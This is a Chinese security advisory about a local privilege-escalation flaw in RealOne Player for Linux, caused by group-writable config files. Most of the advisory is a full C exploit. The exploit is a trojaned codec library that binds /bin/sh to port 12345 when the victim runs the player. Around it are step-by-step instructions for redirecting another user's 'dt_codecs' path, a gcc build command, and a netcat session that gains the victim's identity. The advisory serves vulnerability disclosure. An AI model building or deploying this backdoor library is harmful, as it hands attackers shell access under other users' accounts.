安全研究

安全漏洞
RealOne Player不安全配置文件权限本地权限提升漏洞

发布日期:2003-09-09
更新日期:2003-09-15

受影响系统:
Real Networks RealOne Player Alpha for Linux 2.2
描述:
BUGTRAQ  ID: 8571

RealOne Player是Real公司开发和维护的多媒体播放器软件。

RealOne Player以不安全权限安装配置文件,本地攻击者可以利用这个漏洞修改配置文件,用于提升权限。

默认情况下,配置文件存储在~$USER/.realnetworks/目录中,所有文件全组可写,因此与用户同组的其他用户可以编辑此配置文件。通过修改配置文件中的'dt_codecs'变量指向攻击者指定的目录,在其他高权限用户运行Realone时可导致权限提升。

<*来源:Jon Hart (warchild@spoofed.org
  
  链接:http://www.securityfocus.com/data/vulnerabilities/exploits/rp9-priv-esc.c
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Jon Hart(warchild@spoofed.org) 提供了如下测试程序:

/**
* rp9-priv-esc.c
*
* A local privilege escalation attack against the community supported
* version of Real.com's Realplayer, version 9.
*
* Written by:
*     
*     Jon Hart <warchild@spoofed.org>
*
* By default, configuration files are stored in ~$USER/.realnetworks/,
* but all the files in there are group writeable.  So long as ~$USER
* has group execution permissions (which is pretty common), a malicious
* local user can edit the config files of fellow users to do his biddings.  
*
* There are a number of ways to attack this, but after some poking it seems
* that modifying the path to shared libraries and writing my own malicious
* shared libraries was the easiest.  
*
* (as an aside, just because the shared libraries in the directories contained
* in ~$USER/.realnetworks/RealShared_0_0/ are stripped doesn't mean we can't get
* the symbols back.  objdump quickly can tell us what the names of the 15
* functions are, and we can stub out a bogus shared library pretty quickly.)
*
* This particular bit of code is meant to replace the shared library
* cook.so.6.0, which is contained in the Codecs directory.  To execute this
* attack against a fellow local user, first edit their config file
* (~victim/.realnetworks/RealShared_0_0) to have the 'dt_codecs' variable
* point to a directory under your control, like /tmp/Codecs.  Copy all of the
* existing files from the previous value of dt_codecs (which is usually something
* like ~victim/Real/Codecs/) to /tmp/Codecs.  Next, compile the code below as a
* shared library and copy it to the trojaned directory:
*
*
* `gcc -shared -fPIC -o /tmp/Codecs/cook.so.6.0 rp9-priv-esc.c`
*
*    The next time the victim fires up realplayer 9, a nice little shell
* will be listening on port 12345 for you:
*
* guest@haiti:/$ id
* uid=1006(guest) gid=100(users) groups=100(users)
* guest@haiti:/$ nc localhost 12345
* id
* uid=1000(warchild) gid=100(users) groups=100(users),40(src),1003(wheel)
*
* Of course, you don't have to execute a shell.  Do whatever makes you happy.
*
* Fix?  `chmod 700 ~/.realnetworks/*`
*
*  Copyright (c) 2003, Jon Hart
* All rights reserved.
*
*  Redistribution and use in source and binary forms, with or without modification,
*  are permitted provided that the following conditions are met:
*
*  * Redistributions of source code must retain the above copyright notice,
*    this list of conditions and the following disclaimer.
*  * Redistributions in binary form must reproduce the above copyright notice,
*    this list of conditions and the following disclaimer in the documentation
*    and/or other materials provided with the distribution.
*  * Neither the name of the organization nor the names of its contributors may
*    be used to endorse or promote products derived from this software without
*    specific prior written permission.
*
*
*  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
*  AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
*  IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
*  ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
*  LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
*  DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
*  SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
*  CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
*  OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
*  USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
*
*
*
*/
#define PORT 12345
#include <stdio.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdlib.h>

void RAInitEncoder(void) { }
/** This just happens to be one of the first
* functions that realplayer calls after cook.so.6.0 is loaded
*/
void RAOpenCodec2(void) { cookthis(); }
void RAOpenCodec(void) {  }
void RAGetNumberOfFlavors(void) {  }
void RACloseCodec(void) {  }
void RADecode(void) {  }
void RAEncode(void) {  }
void RAFreeEncoder(void) {  }
void RAGetNumberOfFlavors2(void) {  }
void RAFreeDecoder(void) {  }
void RAFlush(void) {  }
void RAGetFlavorProperty(void) {  }
void G2(void) { }
void RASetFlavor(void) {  }
void RAInitDecoder(void) {  }
void RACreateEncoderInstance(void) { }

/* Bind /bin/sh to PORT.  It forks
* and all that good stuff, so it won't
* easily go away.
*/
int cookthis() {


        int sock_des, sock_client, sock_recv, sock_len, server_pid, client_pid;
        struct sockaddr_in server_addr;
        struct sockaddr_in client_addr;

        if ((sock_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
                exit(EXIT_FAILURE);

        bzero((char *) &server_addr, sizeof(server_addr));
        server_addr.sin_family = AF_INET;
        server_addr.sin_addr.s_addr = htonl(INADDR_ANY);
        server_addr.sin_port = htons(PORT);

        if ((sock_recv = bind(sock_des, (struct sockaddr *) &server_addr, sizeof(server_addr))) != 0)
                exit(EXIT_FAILURE);
        if (fork() != 0)
                exit(EXIT_SUCCESS);
        setpgrp();  
        signal(SIGHUP, SIG_IGN);
        if (fork() != 0)
                exit(EXIT_SUCCESS);
        if ((sock_recv = listen(sock_des, 5)) != 0)
                exit(EXIT_SUCCESS);
        while (1) {
                sock_len = sizeof(client_addr);
                if ((sock_client = accept(sock_des, (struct sockaddr *) &client_addr, &sock_len)) < 0)
                        exit(EXIT_SUCCESS);
                client_pid = getpid();
                server_pid = fork();
                if (server_pid != 0) {
                        dup2(sock_client,0);
                        dup2(sock_client,1);
                        dup2(sock_client,2);

                        execl("/bin/sh","realplay",(char *)0);
                        close(sock_client);
                        exit(EXIT_SUCCESS);
                }
                close(sock_client);
        }
}

建议:
厂商补丁:

Real Networks
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.real.com

浏览次数:3071
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障